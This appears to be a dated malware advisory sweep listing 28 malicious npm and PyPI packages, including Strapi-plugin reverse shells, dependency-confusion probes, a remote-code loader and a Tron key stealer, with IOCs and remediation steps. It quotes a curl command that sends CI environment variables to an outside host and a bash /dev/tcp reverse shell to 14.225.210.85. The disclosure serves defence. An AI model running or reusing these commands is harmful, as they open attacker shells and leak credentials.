# GitHub Advisory malware sweep - 2026-09-16 late + 2026-09-17 (13x `strapi-plugin-*-meeb` port-80 hostname-gated (`ubuntu-fc-uvm`) reverse-shell follow-on to 14.225.210.85:80; `strapi-plugin-osag`/`os-rec` Burp Collaborator OOB recon; `@traktis/environment` + `@traktis/core` dep-confusion pair to `tko.amgsec.com`; `process-mite` npoint.io remote-code loader sibling of `process-lhpm`; `jexkcode` Baileys WhatsApp newsletter-follower; `kartyk-github-*` CWE-506 pentest artefacts; pip `praetorian-mind-rce-test-2026` env exfil + `trongappy` Tron key stealer + `rak-lab-yoav-orca-*` dep-confusion; npm `idx_form_script@999.0.4` 2026-09-17 dep-confusion probe)

> GHSA 2026-09-16 late + 2026-09-17: 13 more `strapi-plugin-*-meeb` reverse-shell packages targeting `14.225.210.85:80` with `ubuntu-fc-uvm` hostname gating; `-osag`/`-os-rec` Burp Collaborator OOB recon variants from the same operator; `@traktis/environment`+`@traktis/core` dep-confusion pair exfiltrating CI env vars to `tko.amgsec.com`; `process-mite` reuses the same `api.npoint.io` loader as yesterday`s `process-lhpm`; `jexkcode` is another Baileys newsletter-follower.

- Published: 2026-09-17
- Severity: high
- Kind: Advisory sweep - A dated batch of GitHub Advisory Database malware entries collected together. A sweep mixes kinds - typosquats, dependency-confusion probes, boilerplate takedowns with no published analysis, and occasionally real payloads - and its severity reflects the worst confirmed item, not the batch as a whole.
- Ecosystems: npm, PyPI
- Scope: 28 packages, 39 compromised versions
- Tags: typosquat, dependency-confusion, infostealer, credential-theft, ci-cd-compromise, crypto-wallet-drain, obfuscation
- Also known as: 2026-09-17 GHSA npm+pip sweep, strapi-plugin-*-meeb port-80 hostname-gated wave (ubuntu-fc-uvm, 14.225.210.85:80), strapi-plugin-osag/-os-rec Burp Collaborator OOB recon, @traktis dep-confusion pair (tko.amgsec.com env exfil), process-mite api.npoint.io remote-code loader (process-lhpm sibling), jexkcode Baileys WhatsApp newsletter-follower, kartyk-github-* pentest OIDC/token artefacts, idx_form_script 999.0.4 dep-confusion probe
- Detected by: GitHub Advisory Database, OpenSSF malicious-packages, OpenSSF Package Analysis, amazon-inspector
- Incident ID: multi-2026-09-17-ghsa-malware-sweep

## Affected packages (28)

Only the exact versions listed were named by the source advisories. Other versions are not implicated.

| Package | Ecosystem | Compromised versions |
|---|---|---|
| [@traktis/core](https://dependencywatch.io/package/npm/@traktis/core) | npm | <=99.99.2 |
| [@traktis/environment](https://dependencywatch.io/package/npm/@traktis/environment) | npm | 99.99.1, 99.99.2 |
| [bender-rspack-config](https://dependencywatch.io/package/npm/bender-rspack-config) | npm | <=1.0.0 |
| [idx_form_script](https://dependencywatch.io/package/npm/idx_form_script) | npm | 999.0.4 |
| [jexkcode](https://dependencywatch.io/package/npm/jexkcode) | npm | 1.0.1, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4 |
| [kartyk-github-oidc-test-pkg](https://dependencywatch.io/package/npm/kartyk-github-oidc-test-pkg) | npm | 1.0.1, 1.0.2, 1.0.4 |
| [kartyk-github-single-ver-pkg](https://dependencywatch.io/package/npm/kartyk-github-single-ver-pkg) | npm | >=0 |
| [kartyk-github-token-pkg](https://dependencywatch.io/package/npm/kartyk-github-token-pkg) | npm | 1.0.3, 1.0.4 |
| [pkg-rollback-dreed-viced-sonic-ponds](https://dependencywatch.io/package/npm/pkg-rollback-dreed-viced-sonic-ponds) | npm | >=0 |
| [praetorian-mind-rce-test-2026](https://dependencywatch.io/package/pypi/praetorian-mind-rce-test-2026) | PyPI | 0.0.1, 0.0.2, 0.0.3 |
| [process-mite](https://dependencywatch.io/package/npm/process-mite) | npm | <=1.1.79 |
| [rak-lab-yoav-orca-zrktd2cp5hjmo4x7](https://dependencywatch.io/package/pypi/rak-lab-yoav-orca-zrktd2cp5hjmo4x7) | PyPI | 9.9.9 |
| [strapi-plugin-cccon-meeb](https://dependencywatch.io/package/npm/strapi-plugin-cccon-meeb) | npm | 3.6.8 |
| [strapi-plugin-ccip-meeb](https://dependencywatch.io/package/npm/strapi-plugin-ccip-meeb) | npm | 3.6.8 |
| [strapi-plugin-ccrec-meeb](https://dependencywatch.io/package/npm/strapi-plugin-ccrec-meeb) | npm | 3.6.8 |
| [strapi-plugin-ccrev-meeb](https://dependencywatch.io/package/npm/strapi-plugin-ccrev-meeb) | npm | 3.6.8 |
| [strapi-plugin-conresh-meeb](https://dependencywatch.io/package/npm/strapi-plugin-conresh-meeb) | npm | 3.6.8 |
| [strapi-plugin-feedmeeb](https://dependencywatch.io/package/npm/strapi-plugin-feedmeeb) | npm | 3.6.8 |
| [strapi-plugin-honey-meeb](https://dependencywatch.io/package/npm/strapi-plugin-honey-meeb) | npm | 3.6.8 |
| [strapi-plugin-listcc-meeb](https://dependencywatch.io/package/npm/strapi-plugin-listcc-meeb) | npm | 3.6.8 |
| [strapi-plugin-maylog-meeb](https://dependencywatch.io/package/npm/strapi-plugin-maylog-meeb) | npm | 3.6.8 |
| [strapi-plugin-os-rec](https://dependencywatch.io/package/npm/strapi-plugin-os-rec) | npm | <=3.6.8 |
| [strapi-plugin-osag](https://dependencywatch.io/package/npm/strapi-plugin-osag) | npm | 3.6.8 |
| [strapi-plugin-perev-meeb](https://dependencywatch.io/package/npm/strapi-plugin-perev-meeb) | npm | 3.6.8 |
| [strapi-plugin-persh-meeb](https://dependencywatch.io/package/npm/strapi-plugin-persh-meeb) | npm | 3.6.8 |
| [strapi-plugin-portcc-meeb](https://dependencywatch.io/package/npm/strapi-plugin-portcc-meeb) | npm | 3.6.8 |
| [strapi-plugin-pysh-meeb](https://dependencywatch.io/package/npm/strapi-plugin-pysh-meeb) | npm | 3.6.8 |
| [trongappy](https://dependencywatch.io/package/pypi/trongappy) | PyPI | 0.0.1 |

## What happened

Between roughly 2026-09-16 12:00 UTC and 2026-09-17 12:00 UTC, GitHub Advisory Database published 25+ new malware advisories (23 npm, 2 pip advisories that were not caught in yesterday`s sweep; 1 npm advisory dated 2026-09-17). Today`s batch is dominated by two operator continuities: the `-meeb` Strapi-plugin RCE operator moved to a hostname-gated `:80` variant of yesterday`s wave, and the `api.npoint.io` remote-code-loader operator republished the same payload under a new package name (`process-mite` vs yesterday`s `process-lhpm`). New patterns: an `@traktis` dep-confusion pair with CI env-var exfil to a domain (`amgsec.com`) that reads as a real pentest firm, and a second Baileys-fork WhatsApp newsletter-follower (`jexkcode` after yesterday`s `plogme`).

## Cluster A - 13x `strapi-plugin-*-meeb` port-80 hostname-gated reverse-shell follow-on

All 13 packages: v3.6.8, `postinstall.js`, C2 `14.225.210.85:80`, hostname gate `os.hostname() === "ubuntu-fc-uvm"`, retry ≤5 attempts.

| Package | GHSA | Shell language | Extra IOC |
|---|---|---|---|
| `strapi-plugin-ccrec-meeb` | GHSA-92rg-hf5c-qwp4 | bash `/dev/tcp` | — |
| `strapi-plugin-conresh-meeb` | GHSA-wqj7-9999-2crf | bash `/dev/tcp` | `/tmp/postinstall-revshell.log` |
| `strapi-plugin-perev-meeb` | GHSA-293w-xgv2-3qrj | python3 PTY | — |
| `strapi-plugin-pysh-meeb` | GHSA-jxxh-j7pf-pvj3 | python3 PTY | — |
| `strapi-plugin-ccrev-meeb` | GHSA-3r87-fhjr-5xhf | bash `/dev/tcp` | — |
| `strapi-plugin-feedmeeb` | GHSA-chmf-v973-774w | bash `/dev/tcp` | hostname/user capture |
| `strapi-plugin-listcc-meeb` | GHSA-5567-73jx-f7g3 | python3 PTY | — |
| `strapi-plugin-maylog-meeb` | GHSA-p65g-47hv-5mfm | python3 PTY | `/tmp/postinstall-revshell.log` |
| `strapi-plugin-portcc-meeb` | GHSA-p247-8vcf-jcm5 | python3 PTY | — |
| `strapi-plugin-persh-meeb` | GHSA-x89g-768f-7xrv | python3 | port 443 fallback + `/tmp/postinstall-revshell.log` |
| `strapi-plugin-honey-meeb` | GHSA-4373-h9cc-p2hr | python3 PTY | log lines "[+] Starting reverse shell" |
| `strapi-plugin-ccip-meeb` | GHSA-8q85-7c4r-6v2c | bash `/dev/tcp` | — |
| `strapi-plugin-cccon-meeb` | GHSA-75rj-xxh3-3j2q | bash `/dev/tcp` | — |

**Operator continuity.** Direct follow-on to `multi-2026-09-16-ghsa-malware-sweep` Cluster D (14 packages, same operator suffix `-meeb`/`-meeb322k`, same C2 `14.225.210.85` but port `:443`, no hostname gate). Yesterday delivered mass reverse-shell coverage; today refines: a lower port (`:80`, which is more likely to be allowed outbound from restrictive CI networks) plus a hostname gate that keeps casual scanners dormant. The 13 name variants remain plausible Strapi plugin names:

- `ccrec` / `ccrev` / `ccip` / `cccon` — plausible Strapi commerce plugin family names
- `feedmeeb` — plausible Strapi feed plugin (typo-inclusive fusion of `feed` + operator suffix)
- `listcc` / `portcc` — plausible list/port CC (credit card?) plugin names
- `honey` — plausible honeypot/monitoring plugin
- `maylog` / `perev` / `pysh` / `persh` / `conresh` — plausible logging/auth plugin names

A Strapi developer allowing bare-name resolution can still hit one of these by name-guess.

## Cluster B - `strapi-plugin-osag` + `strapi-plugin-os-rec` Burp Collaborator OOB recon (same operator)

| Package | GHSA | Payload |
|---|---|---|
| `strapi-plugin-osag` | GHSA-6jhp-v2xp-285p | HTTP GET to `http://8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com/?<hostinfo>` |
| `strapi-plugin-os-rec` | GHSA-q676-3wp5-xm49 | HTTP GET to `http://8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com/osinfo?<hostinfo>` |

Both exfiltrate `hostname`, `os.type`, `os.platform`, `os.arch`, `os.release`, `os.userInfo().username`, `os.homedir()`, and `os.networkInterfaces()` as query parameters. Same operator naming convention as Cluster A (`-meeb`-family Strapi-plugin masquerade) but the payload is a passive Burp Collaborator OOB beacon, not a shell. This mirrors the 2026-09-15 Cluster H beacon (`os-info-meeb322k`, `strapi-plugin-os-info-meeb322k` — same Burp Collaborator domain family) — the operator continues to run parallel recon and RCE payloads under closely-related names, so that a defender who blocks one class misses the other.

## Cluster C - `@traktis/environment` + `@traktis/core` dep-confusion pair to `tko.amgsec.com`

| Package | Version | GHSA | Endpoint |
|---|---|---|---|
| `@traktis/environment` | `99.99.1`, `99.99.2` | GHSA-8w76-frwh-rcpm | `http://tko.amgsec.com/depconf/traktis-environment/` |
| `@traktis/core` | `<=99.99.2` | GHSA-968f-vpg2-j5xr | `http://tko.amgsec.com/depconf/traktis-core/` |

Both manifest `preinstall` AND `postinstall` scripts curl the endpoint with:

```
curl "http://tko.amgsec.com/depconf/traktis-{environment|core}/?who=$(whoami)&host=$(hostname)&pwd=$(pwd)&t=$(date +%s)&env=$(env | grep -E 'GITHUB__|CI_PROJECT|JENKINS_URL|BUILD_URL|GITLAB__|RUNNER_|HOSTNAME|USER|HOME' | base64)"
```

Sentinel version `99.99.x` is a classic dep-confusion resolution-attack version choice. Scope `@traktis` reads as an internal enterprise scope. `amgsec.com` — plausibly AMG Security or similar — the `depconf/` URL path is a **self-labelled** dependency-confusion probe endpoint, so this is most likely a pentest engagement`s probes leaking to public npm. That does NOT reduce the harm: any host that installed the package sent its entire CI environment (including OIDC tokens, cloud IAM keys, build-runner secrets) to a third-party endpoint. Treat those secrets as leaked.

## Cluster D - `process-mite` npm remote-code loader (`api.npoint.io` sibling of `process-lhpm`)

`process-mite@<=1.1.79` (GHSA-vgjx-m4jg-wrvq) is a **direct behavioural sibling** of yesterday`s `process-lhpm` (multi-2026-09-16-ghsa-malware-sweep Cluster E). Same trigger (`require()` auto-invokes `initialize()`), same detached-child-process pattern, same npoint.io URL (`https://api.npoint.io/33e8d008c334b060adad`), same eval pattern (base64 decode of a `code` field). The package.json advertises `getRuntimeInfo` and calls the module "runtime-utils"; the actual `index.js` has none of the advertised functionality and inline comments identify the module as a remote-code-execution client. **`--ignore-scripts` does not block this** — the trigger is `require`, not install.

Operator republishes the same loader under a new name within 24h, which lines up with the takedown speed on `process-lhpm`. Every previously-seen `process-*` npm package tied to the same npoint.io URL should be on your denylist proactively.

## Cluster E - `jexkcode` npm Baileys WhatsApp newsletter-follower

`jexkcode@1.0.1/1.1.0/1.1.1/1.1.2/1.1.3/1.1.4` (GHSA-g9xj-rjfw-h7h6). On any authenticated WhatsApp Web socket, the package auto-invokes `newsletterFollow` on a hardcoded WhatsApp newsletter JID 3 seconds after connection opens — no user consent, no configuration option to disable. Versions 1.0.1 through 1.1.4 progressively remove console-log messages that would have exposed the behaviour; 1.1.4 is fully silent.

Direct behavioural sibling to yesterday`s `plogme` (multi-2026-09-16-ghsa-malware-sweep Cluster A) — same "malicious Baileys fork forcing newsletter subscription for growth-hack purposes" pattern, but without the `crysnovax.link` fingerprinting. Not confirmed as the same operator (different C2 fingerprint), but the tactic and target (WhatsApp automation developers) are identical. The two packages together indicate a small cottage industry of Baileys forks whose only "value-add" is forced newsletter growth for the publisher`s WhatsApp channels.

## Cluster F - `kartyk-github-*` npm CWE-506 pentest OIDC/token artefacts

| Package | Versions | GHSA |
|---|---|---|
| `kartyk-github-single-ver-pkg` | `>=0` | GHSA-4vpr-3r9p-p9fh |
| `kartyk-github-token-pkg` | `1.0.3`, `1.0.4` | GHSA-4rmp-vchm-9gvg |
| `kartyk-github-oidc-test-pkg` | `1.0.1`, `1.0.2`, `1.0.4` | GHSA-4vxh-7998-9h4g |

All three carry the CWE-506 "any computer that has this package installed should be considered fully compromised" GHSA boilerplate with no published payload analysis. Names read as red-team engagement test artefacts (`prod-oidc-test-pkg`, `token-pkg`, `single-ver-pkg`) under a `kartyk-github-` scope prefix — clearly related to yesterday`s `kartykp-prod-oidc-test-pkg`/`kartykp-token-pkg` (multi-2026-09-16-ghsa-malware-sweep Cluster H, only difference is the trailing "p" on the scope prefix). Same actor, expanding the test-artefact set. Treat as `medium` pending analysis.

## Cluster G - pip pentest/dep-confusion probes + one Tron crypto stealer

| Package | Versions | GHSA | Payload |
|---|---|---|---|
| `praetorian-mind-rce-test-2026` | `0.0.1`, `0.0.2`, `0.0.3` | GHSA-8gcf-3vx7-2wrq | env vars + cloud tokens exfil, campaign `2026-09-praetorian-mind-rce-test-2026` |
| `rak-lab-yoav-orca-zrktd2cp5hjmo4x7` | `9.9.9` | GHSA-2mp7-443g-cw4c | IP + username via `setup.py` install hook, campaign `GENERIC-standard-pypi-install-pentest` |
| `trongappy` | `0.0.1` | GHSA-xr9j-54f9-pcpm | TRX private-key stealer, campaign `2025-04-tronix`, mimics README of legitimate TRX libraries |

`praetorian-` is [Praetorian Security](https://www.praetorian.com/), a real pentest firm — the package is self-labelled as their engagement`s "rce-test" artefact. The exfil is real: env vars and cloud tokens go to whatever endpoint Praetorian`s engagement uses. `rak-lab-yoav-orca-*` is a self-labelled dep-confusion "internal test" (`internal test of dependency confusion` verbatim in the advisory). `trongappy` is the odd one out — an actual, non-pentest crypto-wallet-drain package targeting Tron (TRX) blockchain developers.

## Cluster H - misc CWE-506 boilerplate takedowns

- `pkg-rollback-dreed-viced-sonic-ponds` (GHSA-63f3-rmrf-6m9q) — no payload analysis, no IOC, CWE-506 boilerplate only.
- `bender-rspack-config@<=1.0.0` (GHSA-xq97-9c5h-5m43) — OpenSSF Package Analysis flagged for "executes one or more commands associated with malicious behavior"; no specific IOC.

Both `medium` pending payload analysis.

## Cluster I - 2026-09-17 npm `idx_form_script@999.0.4` dep-confusion probe

`idx_form_script@999.0.4` (GHSA-82rh-9f4r-4739, OpenSSF campaign `MAL-2026-16243`). Only 2026-09-17 npm malware advisory today. Version `999.0.4` is a classic dep-confusion resolution-attack sentinel. OpenSSF Package Analysis flagged for "communicates with a domain associated with malicious activity" but no specific C2 host or hash published in the advisory beyond the source hash `59d074c4d6bd941d9586764043d556a83d301711c58eb661d57d63fa06ebec60`. Name reads as an internal script (`idx_form_script` = index-form-script?). Treat as a plausible dep-confusion probe against a real internal name.

## Cross-operator patterns worth flagging

1. **The `-meeb` operator is now on day 3 of a recon-then-RCE cycle** (2026-09-15 Burp Collaborator recon → 2026-09-16 port-443 reverse shells → 2026-09-17 port-80 hostname-gated reverse shells + parallel Burp recon variants). Denylist proactively.
2. **The `api.npoint.io` remote-code operator republishes yesterday`s takedown under a new name.** `process-lhpm` (2026-09-16) → `process-mite` (2026-09-17), same endpoint. Block `api.npoint.io` at CI/host egress — the loader survives every takedown by rebranding.
3. **Baileys-fork WhatsApp newsletter-follower cottage industry.** `plogme` (2026-09-16) + `jexkcode` (2026-09-17) are two separate publishers running the same forced-newsletter-follow tactic; the WhatsApp automation ecosystem has an operator class that is going after Baileys developers specifically.
4. **Pentest artefacts are leaking to public registries at scale.** `kartyk-github-*`/`kartykp-*` npm plus `praetorian-mind-rce-test-2026` and `rak-lab-yoav-orca-*` pip — four separate engagement leftovers with real exfil payloads inside 48h. Treat these as **medium** severity (limited real-world targets) but assume a leaked engagement`s captured secrets are effectively public.

## Registry state

All packages above are flagged as malware on npm and PyPI and quarantined at the time of writing. Private mirrors that cached the tarballs before quarantine keep serving the malicious versions; network-edge egress blocks on `14.225.210.85`, `8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com`, `tko.amgsec.com`, and `api.npoint.io` are the durable mitigation.

## Discovery credits

`GitHub Advisory Database`, `OpenSSF malicious-packages`, `OpenSSF Package Analysis`. Per-package IOC details drawn verbatim from GHSA advisory bodies published between 2026-09-16 12:00 UTC and 2026-09-17 12:00 UTC.

## Impact

- **Cluster A — 13x `strapi-plugin-*-meeb` port-80 hostname-gated (`ubuntu-fc-uvm`) reverse-shell follow-on to `14.225.210.85:80`**: `strapi-plugin-ccrec-meeb`, `-conresh-meeb`, `-perev-meeb`, `-pysh-meeb`, `-ccrev-meeb`, `-feedmeeb`, `-listcc-meeb`, `-maylog-meeb`, `-portcc-meeb`, `-persh-meeb`, `-honey-meeb`, `-ccip-meeb`, `-cccon-meeb` — all v3.6.8, all `postinstall.js` payload, split roughly evenly between `bash -i >& /dev/tcp/14.225.210.85/80 0>&1` and `python3 -c ...pty.spawn("sh")` reverse-shell variants. **All 13 gate on `os.hostname() === "ubuntu-fc-uvm"` before firing** — a distinct evasion tactic that keeps sandbox scanners and generic developer laptops dormant while detonating on the operator`s intended CI runner naming convention. Direct continuation of yesterday`s Cluster D (14 packages, same operator suffix `-meeb`, but yesterday`s were port `:443` with no hostname gate). Same C2 (`14.225.210.85`), one port down, plus a targeting refinement. Some (`strapi-plugin-conresh-meeb`, `-maylog-meeb`, `-persh-meeb`) additionally log to `/tmp/postinstall-revshell.log` — a marker that survives even a failed connection attempt. `strapi-plugin-persh-meeb` also references port 443 as a fallback
- **Cluster B — `strapi-plugin-osag` + `strapi-plugin-os-rec` npm Burp Collaborator OOB recon variants from the same `-meeb` operator (no shell, HTTP GET reconnaissance)**: `strapi-plugin-osag@3.6.8` (GHSA-6jhp-v2xp-285p) and `strapi-plugin-os-rec@<=3.6.8` (GHSA-q676-3wp5-xm49). Same postinstall trigger and same operator naming convention as Cluster A, but the payload is an HTTP GET to `http://8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com/osinfo?...` (Burp Collaborator OOB subdomain) with query parameters carrying hostname, OS type/platform/arch/release, username, home dir, and full network interface enumeration. No shell — passive reconnaissance to build target maps of the operator`s hostname-gated Cluster A hits. Confirms the operator continues to run a parallel recon-then-RCE cycle: yesterday`s 2026-09-15 Cluster H was Burp Collaborator recon (`os-info-meeb322k`, `strapi-plugin-os-info-meeb322k`), 2026-09-16 Cluster D was RCE, and today the operator layers both patterns in the same 24h window
- **Cluster C — `@traktis/environment` + `@traktis/core` npm dep-confusion pair with CI env-var exfil to `tko.amgsec.com` (pre+postinstall)**: `@traktis/environment@99.99.1/99.99.2` (GHSA-8w76-frwh-rcpm) and `@traktis/core@<=99.99.2` (GHSA-968f-vpg2-j5xr). Both preinstall AND postinstall lifecycle scripts curl `http://tko.amgsec.com/depconf/traktis-environment/` and `http://tko.amgsec.com/depconf/traktis-core/` respectively with query parameters carrying `whoami`, hostname, cwd, timestamp, and a base64-encoded dump of every environment variable matching `GITHUB__*`, `CI_PROJECT`, `JENKINS_URL`, `BUILD_URL`, `GITLAB__*`, `RUNNER_*`, `HOSTNAME`, `USER`, `HOME`. Classic dep-confusion sentinel version pattern (99.99.x) — the scope `@traktis` reads as an internal enterprise scope name. `amgsec.com` (AMG Security) is most plausibly a pentest firm domain; the `depconf/` path in the URL is a self-labelled dependency-confusion probe. Treat as a real pentest artefact **and** a functional credential harvester — any host that installed these leaked its full CI environment to the pentest firm`s endpoint, and if that endpoint is later compromised, the leak becomes public
- **Cluster D — `process-mite` npm remote-code loader reusing yesterday`s `api.npoint.io` endpoint (runs on `require`, not install)**: `process-mite@<=1.1.79` (GHSA-vgjx-m4jg-wrvq). On `require("process-mite")` the auto-invoked `initialize()` spawns a detached `node loader.js` process, which HTTPS-fetches `https://api.npoint.io/33e8d008c334b060adad`, base64-decodes the `code` field of the returned JSON, and evaluates it with `new Function()`. **Same npoint.io URL as yesterday`s `process-lhpm`** (multi-2026-09-16-ghsa-malware-sweep Cluster E) — same operator, same mutable remote-code hosting bucket, different package name. Falsely advertises itself as a "runtime-utils" library; declared exports (`getRuntimeInfo`, etc) are absent. **`--ignore-scripts` does NOT block this** — the trigger is `require`, not install-time
- **Cluster E — `jexkcode` npm Baileys WhatsApp newsletter-follower (unauthorised WhatsApp account modification, progressive log-stripping across versions)**: `jexkcode@1.0.1/1.1.0/1.1.1/1.1.2/1.1.3/1.1.4` (GHSA-g9xj-rjfw-h7h6). On any authenticated WhatsApp Web socket the package auto-invokes `newsletterFollow` 3 seconds after connection, forcing the user account to follow a hardcoded newsletter JID with no opt-out or configuration. Versions 1.0.1→1.1.4 progressively strip console-log messages that would have exposed the behaviour — 1.1.4 is fully silent. **Direct behavioural sibling to yesterday`s `plogme`** (multi-2026-09-16-ghsa-malware-sweep Cluster A) — same Baileys-fork tactic, same forced-newsletter-follow abuse. Not confirmed to be the same operator (no shared C2 domain), but the tactic and target ecosystem (WhatsApp automation devs) are identical
- **Cluster F — `kartyk-github-*` npm CWE-506 pentest OIDC/token test artefacts (no published payload analysis)**: `kartyk-github-single-ver-pkg@>=0` (GHSA-4vpr-3r9p-p9fh), `kartyk-github-token-pkg@1.0.3/1.0.4` (GHSA-4rmp-vchm-9gvg), `kartyk-github-oidc-test-pkg@1.0.1/1.0.2/1.0.4` (GHSA-4vxh-7998-9h4g). Closely follow yesterday`s `kartykp-prod-oidc-test-pkg`/`kartykp-token-pkg` pair (multi-2026-09-16-ghsa-malware-sweep Cluster H) — dropped the trailing "p" from the scope prefix (`kartykp` → `kartyk-github`), otherwise same naming convention (`prod-oidc-test-pkg`, `token-pkg`, `single-ver-pkg`). Almost certainly a red-team engagement`s serialised test packages that leaked into npm public. GHSA carries only the CWE-506 boilerplate — no IOC published
- **Cluster G — pip pentest/dep-confusion probes with real env exfil (`praetorian-mind-rce-test-2026`) and a Tron key stealer (`trongappy`)**: `praetorian-mind-rce-test-2026@0.0.1/0.0.2/0.0.3` (GHSA-8gcf-3vx7-2wrq) — self-labelled Praetorian (real pentest firm) test package that exfiltrates environment variables and cloud tokens; carries the `2026-09-praetorian-mind-rce-test-2026` OpenSSF campaign tag. `rak-lab-yoav-orca-zrktd2cp5hjmo4x7@9.9.9` (GHSA-2mp7-443g-cw4c) — self-labelled "internal test of dependency confusion" campaign `GENERIC-standard-pypi-install-pentest`, exfils IP+username. `trongappy@0.0.1` (GHSA-xr9j-54f9-pcpm) — Tron/TRX private-key stealer, `2025-04-tronix` campaign, mimics legitimate TRX library READMEs. First two are pentest artefacts, third is a real crypto-wallet drain
- **Cluster H — misc CWE-506 boilerplate takedowns (no published payload)**: `pkg-rollback-dreed-viced-sonic-ponds@>=0` npm (GHSA-63f3-rmrf-6m9q), `bender-rspack-config@<=1.0.0` npm (GHSA-xq97-9c5h-5m43, OpenSSF Package Analysis flagged as "executes commands associated with malicious behavior" with no further detail). Treat as `medium` pending analysis
- **Cluster I — 2026-09-17 npm `idx_form_script@999.0.4` dep-confusion probe (OpenSSF Package Analysis)**: `idx_form_script@999.0.4` (GHSA-82rh-9f4r-4739, OpenSSF campaign `MAL-2026-16243`). Classic dep-confusion sentinel version (999.x.x). OpenSSF Package Analysis flagged for communicating with "a domain associated with malicious activity" but no specific C2 host/IP published in the advisory. Name `idx_form_script` reads as an internal script name — plausibly a dep-confusion probe against a real internal form-indexing helper

## What to do

1. Grep every `package-lock.json`, `yarn.lock`, `pnpm-lock.yaml`, `package.json`, and Strapi custom-plugin config in your org for every package name in Clusters A through I. Uninstall on hit, wipe `node_modules`, delete the lockfile, rebuild against a clean cache. Clusters A, B, C, D, E, G include real payloads (reverse shells, Burp beacons, env-var exfil, remote-code loaders, WhatsApp account modification, crypto key theft) — a hit is a compromise, not a warning
2. **For Cluster A `strapi-plugin-*-meeb` (:80 hostname-gated wave)**: any CI runner named `ubuntu-fc-uvm` that ran `npm install` for one of the 13 names had an interactive shell on `14.225.210.85:80` during install. Hosts with a different hostname escaped this batch, but the presence of the package in a lockfile still indicates operator interest. Treat any `ubuntu-fc-uvm` runner as compromised: reimage, rotate every credential accessible from that runner, and rename the runner hostname pattern going forward so the hostname gate no longer matches. Block `14.225.210.85` at egress, and extend your denylist of `-meeb`/`-meeb322k` names — the operator escalated from single-port :443 wave (2026-09-16) to :80 + hostname-gate variant (today) within 24h, so treat any future `strapi-plugin-*-meeb` name as adversary-controlled
3. **For Cluster B `strapi-plugin-osag` / `-os-rec`**: passive recon only — no shell established — but a hit means your host details (hostname, OS, network interfaces, username) were sent to a Burp Collaborator subdomain the operator controls. Rotate CI credentials as a precaution, uninstall, and add the `8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com` Burp OOB domain to your egress denylist. Any Strapi CMS developer allowing bare-name plugin resolution should switch to an explicit allowlist
4. **For Cluster C `@traktis/environment` + `@traktis/core`**: any host that installed either package leaked its full CI environment (GitHub OIDC, GitLab tokens, Jenkins BUILD_URL, RUNNER_* secrets) to `tko.amgsec.com`. Rotate every environment-based secret on the affected host. If you maintain an internal `@traktis` scope, pin it to your internal registry with `.npmrc` and configure the registry to refuse public-npm publishes under the same scope. `amgsec.com` may be a legitimate pentest firm domain — check whether you commissioned the engagement; either way, rotate exposed credentials
5. **For Cluster D `process-mite`**: `--ignore-scripts` does NOT block this — the loader runs on `require("process-mite")`, not install. Same `api.npoint.io/33e8d008c334b060adad` endpoint as yesterday`s `process-lhpm`, so blocking `api.npoint.io` at egress covers both packages. Kill any detached Node process fetching from that URL, remove the package, rotate every credential the parent Node process could have touched
6. **For Cluster E `jexkcode`**: any WhatsApp bot running `jexkcode` has silently subscribed the user WhatsApp account to a publisher-controlled newsletter. Uninstall the package, unfollow the newsletter manually from the WhatsApp Web session, pin the real `@whiskeysockets/baileys` package explicitly, and treat any `jexkcode`-published npm package as adversary infrastructure
7. **For Cluster F `kartyk-github-*`**: uninstall on hit, rotate env values as a precaution. No host-forensics response required beyond routine credential-rotation prudence. Same posture as yesterday`s `kartykp-*` Cluster H
8. **For Cluster G (pip)**: `pip uninstall praetorian-mind-rce-test-2026 rak-lab-yoav-orca-zrktd2cp5hjmo4x7 trongappy` and rotate any secrets present in `process.env` during a `pip install` that hit one of these. Any host that imported `trongappy` and had TRX wallet private keys in memory or on disk should treat those keys as stolen. For internal PyPI names, pin your internal registry with `--index-url` and `--extra-index-url` order or use a hash-pinned `requirements.txt`
9. **For Clusters H, I (CWE-506 boilerplate + `idx_form_script`)**: uninstall on hit, rotate env values as a precaution. Full payload analysis has not been published — treat as `medium` and re-check the GHSA advisory over the next few days in case Amazon Inspector or a security-vendor blog publishes IOCs
10. For every `npm install` in CI, prefer `--ignore-scripts` or an equivalent lockfile-consumer mode that blocks pre/post-install hooks. This blocks Clusters A, B, C, F, G, H entirely, but does NOT block Clusters D (`require`-time trigger) or E (WhatsApp connection trigger inside legitimate Baileys use)
11. Add every specific package name below to your internal private-registry deny-list for at least 30 days. Extend your existing `-meeb`/`-meeb322k` scope pins to block any Strapi plugin name matching those suffixes even without a published GHSA. The `-meeb` operator is now on day 3 of a recon-then-RCE cycle (2026-09-15 Burp recon → 2026-09-16 port-443 reverse shells → 2026-09-17 port-80 hostname-gated reverse shells + parallel Burp recon variants) — proactive denylisting saves you from tomorrow`s escalation

## Check your own dependencies

- Check a package-lock.json against this incident: https://dependencywatch.io/check/package-lock-json
- Check a requirements.txt against this incident: https://dependencywatch.io/check/requirements-txt

The scan runs entirely in the browser; lockfile contents are never uploaded.

## References

- [GitHub Advisory Database - recent malware advisories](https://github.com/advisories?query=type%3Amalware&sort=published-desc) - GitHub
- [GHSA-82rh-9f4r-4739 - idx_form_script (Cluster I - 2026-09-17 dep-confusion probe)](https://github.com/advisories/GHSA-82rh-9f4r-4739) - GitHub
- [GHSA-92rg-hf5c-qwp4 - strapi-plugin-ccrec-meeb (Cluster A - hostname-gated reverse shell)](https://github.com/advisories/GHSA-92rg-hf5c-qwp4) - GitHub
- [GHSA-wqj7-9999-2crf - strapi-plugin-conresh-meeb (Cluster A)](https://github.com/advisories/GHSA-wqj7-9999-2crf) - GitHub
- [GHSA-293w-xgv2-3qrj - strapi-plugin-perev-meeb (Cluster A)](https://github.com/advisories/GHSA-293w-xgv2-3qrj) - GitHub
- [GHSA-jxxh-j7pf-pvj3 - strapi-plugin-pysh-meeb (Cluster A)](https://github.com/advisories/GHSA-jxxh-j7pf-pvj3) - GitHub
- [GHSA-3r87-fhjr-5xhf - strapi-plugin-ccrev-meeb (Cluster A)](https://github.com/advisories/GHSA-3r87-fhjr-5xhf) - GitHub
- [GHSA-chmf-v973-774w - strapi-plugin-feedmeeb (Cluster A)](https://github.com/advisories/GHSA-chmf-v973-774w) - GitHub
